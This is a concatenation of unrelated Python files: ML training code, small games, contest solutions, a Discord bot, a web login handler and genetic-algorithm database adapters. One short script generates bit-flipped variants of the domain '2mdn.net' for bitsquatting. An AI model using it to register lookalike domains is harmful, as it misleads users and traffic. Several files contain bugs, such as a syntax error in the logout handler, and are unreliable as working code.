BCE += reconstruction_function(recon_x, x)
# see Appendix B from VAE paper:
# Kingma and Welling. Auto-Encoding Variational Bayes. ICLR, 2014
# https://arxiv.org/abs/1312.6114
# 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)
KLD_element = mu.pow(2).add_(logvar.exp()).mul_(-1).add_(1).add_(logvar)
KLD = torch.sum(KLD_element).mul_(-0.5)
# print(KLD)
# add categorical loss function here
# print(categorical)
# print(torch.sum(categorical.exp().mul(categorical.exp().mul(model.cat_size).add_(1e-9).log())))
# KLD += torch.sum(categorical.exp().mul(categorical.exp().mul(model.cat_size).add_(1e-9).log()))
# c = F.softmax(categorical)
# KLD += torch.sum(c.mul(c.mul(model.cat_size).add_(1e-9).log()))
# KLD += torch.sum(c.mul(c.mul(model.cat_size).add_(1e-9).log()))
return BCE + KLD
optimizer = optim.Adam(model.parameters(), lr=1e-3)
def train(epoch):
model.train()
train_loss = 0
for batch_idx, (data, _) in enumerate(train_loader):
data = Variable(data)
optimizer.zero_grad()
total_batch = []
recon_batch, mu, logvar = model(data)
total_batch.append(recon_batch)
for _ in range(args.num_samples - 1):
recon_batch, _, _ = model.sampleAndDecode(mu, logvar)
total_batch.append(recon_batch)
loss = loss_function(total_batch, data, mu, logvar)
loss.backward()
train_loss += loss.data[0]
optimizer.step()
if batch_idx % args.log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader),
loss.data[0] / len(data)))
print('====> Epoch: {} Average loss: {:.4f}'.format(
epoch, train_loss / len(train_loader.dataset)))
# zs = []
# for _ in range(args.sample_size):
# z = torch.FloatTensor(1,model.z_size).normal_()
# z = Variable(z)
# zs.append(z)
# cs = []
# for i in range(10):
# c = np.zeros((1,10))
# c[0][i] = 1
# c = torch.from_numpy(c).type(torch.FloatTensor)
# c = Variable(c)
# cs.append(c)
def test(epoch):
model.eval()
test_loss = 0
for batch_idx, (data, _) in enumerate(test_loader):
data = Variable(data, volatile=True)
recon_batch, mu, logvar = model(data)
if test_loss == -1:
a = recon_batch.data.numpy()
cv.namedWindow('image', cv.WINDOW_NORMAL)
cv.imshow('image', np.swapaxes(data.data.numpy()[0],0,2))
cv.imshow('image', np.swapaxes(a[0],0,2))
cv.waitKey(0)
cv.destroyAllWindows()
test_loss += loss_function([recon_batch], data, mu, logvar).data[0]
test_loss /= len(test_loader.dataset)
print('====> Test set loss: {:.4f}'.format(test_loss))
if epoch % args.eval_interval == 0:
imgs = []
# for z in zs:
# # for c in cs:
# model.eval()
# x = model.decode(z)
# imgFile = np.swapaxes((x.data).cpu().numpy()[0],0,2)
# print(imgFile.shape)
# imgs.append(imgFile)
# for batch_idx, (data, _) in enumerate(test_loader2):
# data = Variable(data, volatile=True)
# mu, _ = model.encode(data)
# # print(batch_idx)
# img = model.decode(mu)
# img = np.swapaxes(np.swapaxes(img.data.numpy()[0], 0, 1), 1, 2)
# imgs.append(img)
# imgFile = stack(imgs)
# print(imgFile)
# print(imgFile.shape)
# imgFile = imgFile * 255 #/ np.max(imgFile)
# imgFileName = args.save_image + "_" + str(epoch) + ".png"
# cv.imwrite(imgFileName, imgFile)
for batch_idx, (data, _) in enumerate(test_loader2):
if batch_idx % 200 != 0:
continue
img = np.swapaxes(np.swapaxes(data.numpy()[0], 0, 1), 1, 2)
imgs.append(img)
data = Variable(data, volatile=True)
mu, _ = model.encode(data)
# print(batch_idx)
# a = torch.from_numpy(np.eye(10)[y_class.numpy()]).type(torch.FloatTensor)
img = model.decode(mu)
img = np.swapaxes(np.swapaxes(img.data.numpy()[0], 0, 1), 1, 2)
imgs.append(img)
imgFile = stack(imgs)
imgFile = imgFile * 255 #/ np.max(imgFile)
imgFileName = args.save_image + "_" + str(epoch) + ".png"
cv.imwrite(imgFileName, imgFile)
def stack(ra):
num_per_row = int(np.sqrt(len(ra)))
rows = [np.concatenate(tuple(ra[i* num_per_row : i*num_per_row + num_per_row]), axis=1)
for i in range(num_per_row)]
img = np.concatenate(tuple(rows), axis=0)
return img
if args.load_model:
model = torch.load(args.load_model)
for epoch in range(1, args.epochs + 1):
if "train" in args.mode:
train(epoch)
if "eval" in args.mode:
test(epoch)
if epoch % args.save_interval == 0:
torch.save(model, args.save_model + "_" + str(epoch))
torch.save(model, args.save_model + "_" + str(epoch))
|
# noinspection PyUnresolvedReferences
from .sub.subadmins.classbook import *
# noinspection PyUnresolvedReferences
from .sub.subadmins.homework import *
|
import zmq
import time
class ClientV1(object):
"""description of class"""
def run(self):
context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect("tcp://localhost:18475")
while True:
print "Client version 1 is active..."
socket.send("alpha...beta...gama")
response = socket.recv()
print "Response is {0}".format(response)
time.sleep(2)
if __name__ == "__main__":
client = ClientV1()
client.run() |
t = int(raw_input())
def index(n,c,i):
return i*pow(n,c-1)+1
for i in range(1,t+1):
m = map(int, raw_input().split(" "))
n = m[0]
c = m[1]
s = m[2]
str1 = "Case #"+str(i)+": "
L = []
for i in range(0,n):
L.append(index(n,c,i))
for x in L:
str1+=str(x)
str1+=" "
print str1 |
# Code adapted from Corey Shafer
nums = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
# Rather than doing a for each loop and appending to the list, this is a comprehension
my_list = [n for n in nums]
print(my_list)
# For the same thing, but multipling each value by itself:
my_list = [n*n for n in nums]
print(my_list)
# Using a map + lambda-> Doesn't read well at all. Use comprehensions
# my_list = map(lambda n: n*n, nums)
# print(my_list)
#This time: I want 'n' for each 'n' in nums if 'n' is even
my_list = [n for n in nums if n % 2 == 0]
print(my_list)
# I want a (letter, num) pair for each letter in 'abcd' and each number in '01234'
my_list = [(letter, num) for letter in 'abcd' for num in range(0, 4)]
print(my_list)
names = ['Bruce', 'Clark', 'Peter', 'Logan', 'Wade']
heroes = ['Batman', 'Superman', 'Spiderman', 'Wolverine', 'Deadpool']
# print(list(zip(names, heroes)))
# my_dict = {}
# for names, heroes in zip(names, heroes):
# my_dict[names] = heroes
# print(my_dict)
my_dict = {name: hero for name, hero in zip(names, heroes) if name != "Peter"}
print(my_dict)
# Remember: Sets have unique values
nums = [1,1,1,1,1, 2, 5, 7, 2, 9, 4, 8, 4]
my_set = set()
for n in nums:
my_set.add(n)
print(my_set)
my_set = {n for n in nums}
print(my_set)
# generator Expressions:
|
import nltk
from nltk.corpus import wordnet
#import lemma
def calculate(queryv,queryn,queryr,verb,noun,adverb):
tot = 0; count = 1
lqv = len(queryv)
lqn = len(queryn)
lqr = len(queryr)
lv = len(verb)
ln = len(noun)
lr = len(adverb)
f = open('semantic_data.txt','a+')
#compare verbs of query and meta description
for i in range(lqv):
for j in range(lv):
try:
w1 = wordnet.synset(queryv[i])
w2 = wordnet.synset(verb[j])
#print(w1)
t1 =w1.wup_similarity(w2)
#print(t1)
f.write("\n"+queryv[i]+"\t\t\t"+verb[j]+"\t\t\t\t"+str(t1))
tot += t1
count += 1
except:
pass
#print(tot)
f.write("\n"+str(tot)+"\n")
#compare nouns of query and meta description
for i in range(lqn):
for j in range(ln):
try:
w1 = wordnet.synset(queryn[i])
w2 = wordnet.synset(noun[j])
#print(w1)
t2 = w1.wup_similarity(w2)
#print(t2)
f.write("\n" + queryn[i] + "\t" + noun[j] + "\t\t" + str(t2))
tot += t2
count += 1
#print(sum)
except:
pass
#print(tot)
f.write("\n"+str(tot) + "\n")
#compare adverbs of query and meta description
for i in range(lqr):
for j in range(lr):
try:
w1 = wordnet.synset(queryr[i])
w2 = wordnet.synset(adverb[j])
#print(w1)
t3 = w1.wup_similarity(w2)
#print(t3)
f.write("\n" + queryr[i] + "\t" + adverb[j] + "\t\t" + str(t3))
tot += t3
count += 1
except:
pass
#print(tot/count)
f.write("\n"+str(tot) + "\n" + "Rel_value=" + str(tot/count))
f.close()
return tot/count
|
class ComponentNotInstalledError(Exception):
""" Raised when a framework component is not installed"""
pass
class DirectoryNotFoundError(Exception):
"""Raised when a directory is excpected but not found"""
pass
class PackageNotInstalledError(Exception):
"""Raised when a package is expected but not installed"""
pass
|
ANS = []
T = int(input())
for l in range(T):
S, SG, FG, D, TM = map(int, input().strip(' ').split())
SPD = S + (D*180/TM)
SE = abs(SPD - SG)
FE = abs(SPD - FG)
if SE < FE:
ANS.append('SEBI')
elif SE > FE:
ANS.append('FATHER')
elif SE == FE:
ANS.append('DRAW')
for a in ANS:
print(a)
|
import os
import torch
import torch.nn as nn
from .gnmt import GNMT
from .nmt import NMTModel
from .seq2seq import Seq2Seq
from translators.logger import logger
def count_parameters(model, trainable: bool = True):
return sum(p.numel() for p in model.parameters() if p.requires_grad == trainable)
def save_checkpoint(cnf, model, optimizer, tokenizer, step):
if not os.path.exists(cnf.save_dir):
os.mkdir(cnf.save_dir)
nmtmodel = model.module if isinstance(model, nn.DataParallel) else model
chkpt_file_path = os.path.join(cnf.save_dir, 'nmt_model_chkpt.pt')
chkpt = {
'step': step,
'model': nmtmodel.state_dict(),
'optimizer': optimizer,
'vocab': {"tokens": tokenizer.vocab,
"feats": tokenizer.feat_vocabs}
}
torch.save(chkpt, chkpt_file_path)
logger.info(f'Best model was saved in {chkpt_file_path} !!!')
def load_chkpt(chkpt_file: str, optimizer=None, device: str = 'cuda'):
assert os.path.exists(chkpt_file), f'{chkpt_file} is not exits !!!'
chkpt = torch.load(chkpt_file, map_location=device)
step = chkpt['step']
vocab = chkpt['vocab']
if optimizer is not None:
optimizer = chkpt['optimizer']
if optimizer is not None:
return step, chkpt['model'], optimizer, vocab
else:
return step, chkpt['model'], None, vocab
__all__ = ['NMTModel', 'GNMT', 'Seq2Seq'
'count_parameters', 'save_checkpoint']
|
import platform,os, sys, time,csv,contextlib
cPalabraIni=''
cLetraEntro=''
iLetraLargo=0
iIntenfalla=0
bloop=True
lst_Espacio=[]
lst_Entrada=[]
Lst_ImagenA= ['''
+---+
| |
|
|
|
|
=========''', '''
+---+
| |
O |
|
|
|
=========''', '''
+---+
| |
O |
| |
|
|
=========''', '''
+---+
| |
O |
/| |
|
|
=========''', '''
+---+
| |
O |
/|\ |
|
|
=========''', '''
+---+
| |
O |
/|\ |
/ |
|
=========''', '''
+---+
| |
O |
/|\ |
/ \ |
|
=========''']
def Clear():
if platform.system() == 'Windows':
os.system('cls')
else:
os.system('clear')
def Print_Menu(cPalabraIni, lst_Espacio):
Clear()
# print(cPalabraIni)
Imprima_Espacios(lst_Espacio)
print(30 * "-" , "AHORCADO" , 30 * "-")
print("1. Introducir Palabra ")
print("2. Jugar")
print("0. Salir")
print(68 * "-")
return
def Bienvenida():
Clear()
print(30 * "-" , "AHORCADO" , 30 * "-")
print("Listo para un ahorcado?")
print("Te explico brevemente las reglas:")
print(68 * "-")
print("Este es un juego de 2 personas, si.. 2 personas.")
print("La primera persona ingresa una palabra, y la segunda tiene que adivinar.")
print("El resto es igual a cualquier otro ahorcado.")
print(68 * "-")
print("---DIVIERTANSE---")
time.sleep(0)
def Imprima_Espacios(lst_Espacio):
print(lst_Espacio)
def Captura(cPalabraIni,lst_Espacio):
cPalabraIni = str.upper(str(input('Ingrese la palabra: ')))
for i in range(len(cPalabraIni)):
lst_Espacio.append('_')
return (cPalabraIni, lst_Espacio)
def Jugar(cPalabraIni,lst_Entrada,lst_Espacio,iIntenfalla):
# while iIntentos!=0:
cLetraEntro = str.upper(str(input('Ingrese la Letra: ')))
if len(cLetraEntro) != 1:
print('Solo puede digitar una letra.')
else:
if cLetraEntro not in cPalabraIni:
iIntenfalla=iIntenfalla+1
print(Lst_ImagenA[iIntenfalla])
else:
# print(cPalabraIni)
# print(len(cPalabraIni))
for j in range(len(cPalabraIni)):
if cPalabraIni[j]==cLetraEntro:
lst_Espacio[j]=cLetraEntro
# print(j)
# print(cPalabraIni[j])
# Imprima_Espacios(lst_Espacio)
if lst_Espacio == cPalabraIni:
print('Se acabo el juego! Ganaste')
time.sleep(2)
return (lst_Entrada,lst_Espacio,iIntenfalla)
iChoice = 0
Bienvenida()
cPalabraIni=''
cLetraEntro=''
while bloop:
Print_Menu(cPalabraIni, lst_Espacio)
print(Lst_ImagenA[iIntenfalla])
iChoice = int(input('Enter su seleccion [0-2]: '))
if iChoice == 1:
cPalabraIni,lst_Espacio=Captura(cPalabraIni,lst_Espacio)
elif iChoice == 2:
lst_Entrada, lst_Espacio,iIntenfalla= Jugar(cPalabraIni,lst_Entrada,lst_Espacio,iIntenfalla)
print(Lst_ImagenA[iIntenfalla])
elif iChoice == 0:
break
|
import binascii
domain = "2mdn"
tld = ".net"
bin_repr = bin(int.from_bytes(domain.encode(), 'big'))
bin_repr = bin_repr[2:] #chop off '0b'
for index, bit in enumerate(bin_repr):
if bit == '1':
bit = '0'
else:
bit = '1'
new_bin_repr = bin_repr[:index] + bit + bin_repr[index + 1:]
new_bin_repr = '0b' + new_bin_repr
n = int(new_bin_repr, 2)
try:
new_domain = n.to_bytes((n.bit_length() + 7) // 8, 'big').decode()
print(new_domain.lower() + tld)
except:
pass
|
#!/usr/bin/env python
import sys
def reverse_words(sentence):
reverse_words = sentence.split(' ')[::-1]
return ' '.join(reverse_words)
def get_sentences(input_file):
with open(input_file, 'r') as f:
data = f.read()
sentences = data.split('\n')
return filter(lambda x: x != '', sentences)
def reverse_sentences(input_file):
sentences = [reverse_words(x) for x in get_sentences(input_file)]
return '\n'.join(sentences)
if __name__ == '__main__':
print reverse_sentences(sys.argv[1])
|
from PRS import PRS_extract_phenotypes
import PRS_sumstats
full_bfile_path="/net/mraid08/export/jafar/Microbiome/Analyses/PNPChip/cleanData/PNP_autosomal_clean2_nodfukim"
#extract phenotypes IID Vs. Measured Phenotypes
df_pheno = PRS_extract_phenotypes.extract('s_stats_pheno') #Used for training set
#extract the predicted trait
trait = 'bmi' #
traits_dict = PRS.PRS_sumstats.get_traits_dict() #Dictionary with all Traits
assert (trait in traits_dict)
pheno_col = traits_dict[trait]
df_pheno_train = df_pheno[[pheno_col]] #Building Training set
train_index = df_pheno_train.index[:100] #use the first 100 individuals for training
df_prs = PRS.PRS_sumstats.compute_prs(df_pheno, bfile_path=full_bfile_path, train_indices=train_index, trait_name=trait)
df_prs.hist(bins=100)
print ("Finished") |
# -----------------------------------------------------------
# Behave Step Definitions for Aries DIDComm File and MIME Types, RFC 0044:
# https://github.com/hyperledger/aries-rfcs/blob/main/features/0044-didcomm-file-and-mime-types/README.md
#
# -----------------------------------------------------------
from time import sleep
from behave import given, when, then
import json, time
from agent_backchannel_client import agent_backchannel_GET, agent_backchannel_POST, expected_agent_state, setup_already_connected
@given('"{agent}" is running with parameters "{parameters}"')
def step_impl(context, agent, parameters):
agent_url = context.config.userdata.get(agent)
params_json = json.loads(parameters)
data = {
"parameters": params_json
}
(resp_status, resp_text) = agent_backchannel_POST(agent_url + "/agent/command/", "agent", operation="start", data=data)
assert resp_status == 200, f'resp_status {resp_status} is not 200; {resp_text}'
@then('"{requester}" can\'t accept the invitation')
def step_impl(context, requester):
data = context.responder_invitation
data["use_existing_connection"] = False
(resp_status, resp_text) = agent_backchannel_POST(context.requester_url + "/agent/command/", "out-of-band", operation="receive-invitation", data=data)
assert resp_status == 500, f'agent command should fail but resp_status {resp_status} is not 500; {resp_text}'
|
import Handler,usersdb ,userfun
logged = {}
class Signup(Handler.Handler):
def get(self):
self.render("signup_form.html")
def post(self):
username = self.request.get("username")
email = self.request.get("email")
password = self.request.get("password")
conf = self.request.get("conf")
#i nedd to get the img
error=" "
user = usersdb.Users.all().filter("username =", username).get()
if user :
error = "This username is already taken"
user = usersdb.Users.all().filter("email =" , email).get()
if user:
error = error +" the email i already used"
if error !=" " :
self.render("signup_form.html" ,error = user, username = user, email = email)
else:
password = userfun.hashed(password)
cookie = username + "|" +userfun.cookistr(username)
self.response.headers.add_header('Set-Cookie','user=%s'%str(cookie))
user1 =usersdb.Users(username = username, password =password,email = email)
user1.put()
logged[cookie] = user1
self.redirect("/")
class Login(Handler.Handler):
def get(self):
self.render("signup_form.html")
def post(self):
username = self.request.get("username")
password = self.request.get("password")
user = usersdb.Users.all().filter("username =",username).get()
if user:
passwordo = user.password
salt = passwordo.split('|')[1]
genpass = userfun.hashed(password , salt)
if genpass == passwordo:
cookie= username +"|"+userfun.cookistr(username)
self.response.headers.add_header('Set-Cookie','user=%s'%str(cookie))
logged[cookie] = user
self.redirect('/')
else :
self.render("signup_form.html", error="password or username ain't correct")
else :
self.render("signup_form.html", error="password or username ain't correct")
class Logout(Handler.Handler):
def get(self):
user = self.response.headers['user']
self.response.headers.add_header('Set-cookie','user=;')
logged.del('user')
self.redirect('/')
|
import os
import discord
from discord.ext import commands, tasks
from dotenv import load_dotenv
import logging
import queue
import glob_vars
STATUS_MESSAGE = " frustrated screams.."
USERNAME = "Rolbert 🎲"
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')
client = discord.Client()
@client.event
async def on_ready():
logging.info(f'{client.user} has connected to Discord!')
await client.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=STATUS_MESSAGE))
try:
await client.user.edit(username=USERNAME)
except:
print("couldnt change username")
for guild in client.guilds:
logging.info(guild)
@client.event #receive msg event callback -----------------------
async def on_message(message):
if message.author == client.user:
return
glob_vars.send_bot_receive_queue(message)
@tasks.loop(seconds=0.05)
async def loop():
if glob_vars.terminate:
exit() # not a clean way to exit!
try:
send_item = glob_vars.send_queue.get(False)
logging.info(send_item)
channel, content = send_item
await channel.send(content)
except queue.Empty:
send_item = None
def start_api():
client.run(TOKEN)
loop.start()
|
import torch
from UnarySim.sw.stream.gen import RNG
from UnarySim.sw.stream.shuffle import SkewedSync, Bi2Uni, Uni2Bi
from UnarySim.sw.kernel.shiftreg import ShiftReg
from UnarySim.sw.kernel.abs import UnaryAbs
import math
class CORDIV_kernel(torch.nn.Module):
"""
the kernel of the correlated divivison
this kernel is for unipolar only
dividend and divisor have to synchronized
"""
def __init__(self,
depth=4,
rng="Sobol",
rng_dim=4,
stype=torch.float):
super(CORDIV_kernel, self).__init__()
self.depth = depth
self.sr = ShiftReg(depth, stype)
self.rng = RNG(int(math.log2(depth)), rng_dim, rng, torch.long)()
self.idx = torch.nn.Parameter(torch.zeros(1).type(torch.float), requires_grad=False)
self.stype = stype
self.init = torch.nn.Parameter(torch.ones(1).type(torch.bool), requires_grad=False)
self.historic_q = torch.nn.Parameter(torch.ones(1).type(stype), requires_grad=False)
def forward(self, dividend, divisor):
# generate the random number to index the shift register
# 1) generate based on divisor value, conditional probability
# if self.init.item() is True:
# self.historic_q = torch.gather(self.sr.sr, 0, self.rng[self.idx.type(torch.long)%self.depth].type(torch.long))
# self.init.data.fill_(False)
# else:
# self.historic_q = torch.gather(self.sr.sr, 0, torch.unsqueeze(self.rng[self.idx.type(torch.long)%self.depth].type(torch.long), 0))
# divisor_eq_1 = torch.eq(divisor, 1).type(self.stype)
# self.idx.data = self.idx.add(divisor_eq_1)
# 2) always generating, no need to deal conditional probability
divisor_eq_1 = torch.eq(divisor, 1).type(self.stype)
self.historic_q.data = self.sr.sr[self.rng[self.idx.type(torch.long)%self.depth]]
self.idx.data = self.idx.add(1)
quotient = (divisor_eq_1 * dividend + (1 - divisor_eq_1) * self.historic_q).view(dividend.size())
# shift register update
# 1) update shift register based on whether divisor is valid
dontcare1, dontcare2 = self.sr(quotient.type(self.stype), mask=divisor_eq_1)
# 2) always update shift register
# dontcare1, dontcare2 = self.sr(quotient.type(self.stype), mask=None)
return quotient.type(self.stype)
class UnaryDiv(torch.nn.Module):
"""
this module is for unary div, i.e., iscbdiv.
"""
def __init__(self,
depth_abs=3,
depth_sync=2,
depth_kernel=2,
shiftreg_abs=False,
mode="bipolar",
rng="Sobol",
rng_dim=4,
btype=torch.float,
stype=torch.float):
super(UnaryDiv, self).__init__()
# data representation
self.mode = mode
self.stype = stype
if self.mode is "bipolar":
self.abs_dividend = UnaryAbs(depth=depth_abs, shiftreg=shiftreg_abs, stype=stype, btype=btype)
self.abs_divisor = UnaryAbs(depth=depth_abs, shiftreg=shiftreg_abs, stype=stype, btype=btype)
self.bi2uni_dividend = Bi2Uni(stype=stype)
self.bi2uni_divisor = Bi2Uni(stype=stype)
self.uni2bi_quotient = Uni2Bi(stype=stype)
self.ssync = SkewedSync(depth=depth_sync, stype=stype, btype=btype)
self.cordiv_kernel = CORDIV_kernel(depth=depth_kernel, rng=rng, rng_dim=rng_dim, stype=stype)
def bipolar_forward(self, dividend, divisor):
sign_dividend, abs_dividend = self.abs_dividend(dividend)
sign_divisor, abs_divisor = self.abs_divisor(divisor)
uni_abs_dividend = self.bi2uni_dividend(abs_dividend)
uni_abs_divisor = self.bi2uni_divisor(abs_divisor)
uni_abs_quotient = self.unipolar_forward(uni_abs_dividend, uni_abs_divisor)
bi_abs_quotient = self.uni2bi_quotient(uni_abs_quotient)
bi_quotient = sign_dividend.type(torch.int8) ^ sign_divisor.type(torch.int8) ^ bi_abs_quotient.type(torch.int8)
return bi_quotient
def unipolar_forward(self, dividend, divisor):
dividend_sync, divisor_sync = self.ssync(dividend, divisor)
quotient = self.cordiv_kernel(dividend_sync, divisor_sync)
return quotient
def forward(self, dividend, divisor):
if self.mode is "bipolar":
output = self.bipolar_forward(dividend, divisor)
else:
output = self.unipolar_forward(dividend, divisor)
return output.type(self.stype)
class GainesDiv(torch.nn.Module):
"""
this module is for Gaines division.
"""
def __init__(self,
depth=5,
mode="bipolar",
rng="Sobol",
rng_dim=1,
stype=torch.float):
super(GainesDiv, self).__init__()
# data representation
self.mode = mode
self.scnt_max = torch.nn.Parameter(torch.tensor([2**depth-1]).type(torch.float), requires_grad=False)
self.scnt = torch.nn.Parameter(torch.tensor([2**(depth-1)]).type(torch.float), requires_grad=False)
self.rng = RNG(depth, rng_dim, rng, torch.float)()
self.rng_idx = torch.nn.Parameter(torch.zeros(1).type(torch.long), requires_grad=False)
self.divisor_d = torch.nn.Parameter(torch.zeros(1).type(torch.int8), requires_grad=False)
self.stype = stype
def forward(self, dividend, divisor):
# output is the same for both bipolar and unipolar
output = torch.gt(self.scnt, self.rng[self.rng_idx%self.rng.numel()]).type(torch.int8)
self.rng_idx.data = self.rng_idx + 1
output = output + torch.zeros_like(dividend, dtype=torch.int8)
if self.mode is "unipolar":
inc = dividend.type(torch.float)
dec = (output & divisor.type(torch.int8)).type(torch.float)
else:
dd_ds = 1 - (dividend.type(torch.int8) ^ divisor.type(torch.int8))
ds_ds = 1 - (self.divisor_d ^ divisor.type(torch.int8))
self.divisor_d.data = divisor.type(torch.int8)
ds_ds_out = 1 - (ds_ds ^ (1 - output))
inc = (dd_ds & ds_ds_out).type(torch.float)
dec = ((1 - dd_ds) & (1 - ds_ds_out)).type(torch.float)
# following implementation is not good for accuracy due to fluctuation of negative output.
# inc = dividend.type(torch.float)
# dec = (1 - output ^ divisor.type(torch.int8)).type(torch.float)
# scnt is also the same in terms of the up/down behavior and comparison
self.scnt.data = (inc * (self.scnt + 1) + (1 - inc) * self.scnt).view(dividend.size())
self.scnt.data = (dec * (self.scnt - 1) + (1 - dec) * self.scnt)
self.scnt.data = self.scnt.clamp(0, self.scnt_max.item())
return output.type(self.stype)
|
import numpy as np
# import pandas as pd
from std_msgs.msg import UInt16
class DataResolver:
def __init__(self):
self.arr = []
def avg_resolver(self, arr):
#pick out all none values
self.arr = arr [np.logical_not(np.isnan(arr))]
# self.r_arr = right_arr [np.logical_not(pd.isnull(right_arr))]
avg = self.cal_avg(self.arr)
return avg
def cal_avg(self,arr):
if arr is not None:
avg = []
[row] = arr.shape
x_arr = np.array([],dtype=UInt16)
y_arr = np.array([],dtype=UInt16)
for i in range(row):
if i % 2 == 0:
x_arr = np.append(x_arr,arr[i] )
else:
y_arr = np.append(y_arr,arr[i] )
try:
avg_x = np.mean(x_arr)
avg_y = np.mean(y_arr)
avg =[avg_x, avg_y]
except ZeroDivisionError as e :
print("no targets have been found!")
print(e)
# print("avg",avg)
# count =0
else:
pass
return avg
def box_resolver(self, bbox_lst):
sum_x, sum_y ,sum_w,sum_h = 0,0,0,0
num = len(bbox_lst)
if num == 0:
print("There is no data in the bbox_lst.")
pass
else:
# sum_x = np.sum()
for i in range(num):
box_tuple = bbox_lst[i]
# print("box:",box_tuple)
sum_x += box_tuple[0]
sum_y += box_tuple[1]
sum_w += box_tuple[2]
sum_h += box_tuple[3]
x = sum_x/num
y = sum_y/num
w = sum_w/num
h = sum_h/num
box_tuple = (x,y,w,h)
return box_tuple
#This function can calculate the distance in the world coordination.
def distance_resolver(self,start, end):
x_distance = np.square(start[0] - end[0])
y_distance = np.square(start[1]- end[1])
distance = np.sqrt((x_distance + y_distance))
return distance
def angle_resolver(self, a, b, angle_type):
if angle_type == "sin":
sin = a / b
if sin > 1:
sin = 1
# print("sin:",sin)
inv = np.arcsin(sin)
angle = np.degrees(inv)
# print("the volume of degrees need to be corrected:",angle)
elif angle_type == "cos":
cos = a/ b
if cos > 1:
cos = 1
# print("cos:", cos)
inv = np.arccos(cos)
angle = np.degrees(inv)
# print("the volume of degrees need to be corrected:",angle)
elif angle_type == "tan":
tan = a/b
if tan >1:
tan=1
inv = np.arctan(tan)
angle = np.degrees(inv)
# print("the volume of degrees need to be corrected:",angle)
return angle |
"""
:mod:`DBAdapters` -- database adapters for statistics
=====================================================================
.. warning:: the use the of a DB Adapter can reduce the performance of the
Genetic Algorithm.
Pyevolve have a feature in which you can save the statistics of every
generation in a database, file or call an URL with the statistics as param.
You can use the database to plot evolution statistics graphs later. In this
module, you'll find the adapters above cited.
.. seealso::
Method :meth:`GSimpleGA.GSimpleGA.setDBAdapter`
DB Adapters are set in the GSimpleGA Class.
"""
import Consts
import sqlite3
import logging
import types
import datetime
import Statistics
import urllib
import csv
class DBFileCSV:
""" DBFileCSV Class - Adapter to dump statistics in CSV format
Example:
>>> adapter = DBFileCSV(filename="file.csv", identify="run_01",
frequency = 1, reset = True)
:param filename: the CSV filename
:param identify: the identify of the run
:param frequency: the generational dump frequency
:param reset: if is True, the file old data will be overwrite with the new
"""
def __init__(self, filename=Consts.CDefCSVFileName, identify=None,
frequency = Consts.CDefCSVFileStatsGenFreq, reset=True):
""" The creator of DBFileCSV Class """
if identify is None:
self.identify = datetime.datetime.strftime(datetime.datetime.now(), "%d/%m/%y-%H:%M")
else:
self.identify = identify
self.filename = filename
self.statsGenFreq = frequency
self.csvWriter = None
self.fHandle = None
self.reset = reset
def __repr__(self):
""" The string representation of adapter """
ret = "DBFileCSV DB Adapter [File='%s', identify='%s']" % (self.filename, self.identify)
return ret
def open(self):
""" Open the CSV file or creates a new file """
logging.debug("Opening the CSV file to dump statistics [%s]", self.filename)
if self.reset: open_mode = "w"
else: open_mode = "a"
self.fHandle = open(self.filename, open_mode)
self.csvWriter = csv.writer(self.fHandle, delimiter=';')
def close(self):
""" Closes the CSV file handle """
if self.fHandle:
self.fHandle.close()
def commitAndClose(self):
""" Commits and closes """
self.commit()
self.close()
def commit(self):
""" Stub """
pass
def insert(self, stats, population, generation):
""" Inserts the stats into the CSV file
:param stats: statistics object (:class:`Statistics.Statistics`)
:param population: population to insert stats (:class:`GPopulation.GPopulation`)
:param generation: the generation of the insert
"""
line = [self.identify, generation]
line.extend(stats.asTuple())
self.csvWriter.writerow(line)
class DBURLPost:
""" DBURLPost Class - Adapter to call an URL with statistics
Example:
>>> dbadapter = DBSQLite(url="http://localhost/post.py", identify="test")
The parameters that will be sent is all the statistics described in the :class:`Statistics.Statistics`
class, and the parameters:
**generation**
The generation of the statistics
**identify**
The id specified by user
.. note:: see the :class:`Statistics.Statistics` documentation.
:param url: the URL to be used
:param identify: the identify of the run
:param frequency: the generational dump frequency
:param post: if True, the POST method will be used, otherwise GET will be used.
"""
def __init__(self, url, identify=None,
frequency = Consts.CDefURLPostStatsGenFreq, post=True):
""" The creator of the DBURLPost Class. """
if identify is None:
self.identify = datetime.datetime.strftime(datetime.datetime.now(), "%d/%m/%y-%H:%M")
else:
self.identify = identify
self.url = url
self.statsGenFreq = frequency
self.post = post
def __repr__(self):
""" The string representation of adapter """
ret = "DBURLPost DB Adapter [URL='%s', identify='%s']" % (self.url, self.identify)
return ret
def open(self):
""" Stub """
def close(self):
""" Stub """
pass
def commitAndClose(self):
""" Stub """
pass
def commit(self):
""" Stube """
pass
def insert(self, stats, population, generation):
""" Sends the data to the URL using POST or GET
:param stats: statistics object (:class:`Statistics.Statistics`)
:param population: population to insert stats (:class:`GPopulation.GPopulation`)
:param generation: the generation of the insert
"""
logging.debug("Sending http request to %s.", self.url)
response = None
params = stats.internalDict.copy()
params["generation"] = generation
params["identify"] = self.identify
if self.post: # POST
response = urllib.urlopen(self.url, urllib.urlencode(params))
else: # GET
response = urllib.urlopen(self.url + "?%s" % (urllib.urlencode(params)))
if response: response.close()
class DBSQLite:
""" DBSQLite Class - Adapter to dump data in SQLite3 database format
Example:
>>> dbadapter = DBSQLite(identify="test")
When you run some GA for the first time, you need to create the database, for this, you
must use the *resetDB* parameter:
>>> dbadapter = DBSQLite(identify="test", resetDB=True)
This parameter will erase all the database tables and will create the new ones.
The *resetDB* parameter is different from the *resetIdentify* parameter, the *resetIdentify*
only erases the rows with the same "identify" name.
:param dbname: the database filename
:param identify: the identify if the run
:param resetDB: if True, the database structure will be recreated
:param resetIdentify: if True, the identify with the same name will be overwrite with new data
:param frequency: the generational dump frequency
:param commit_freq: the commit frequency
"""
def __init__(self, dbname=Consts.CDefSQLiteDBName, identify=None, resetDB=False,
resetIdentify=True, frequency=Consts.CDefSQLiteStatsGenFreq,
commit_freq=Consts.CDefSQLiteStatsCommitFreq):
""" The creator of the DBSQLite Class """
if identify is None:
self.identify = datetime.datetime.strftime(datetime.datetime.now(), "%d/%m/%y-%H:%M")
else:
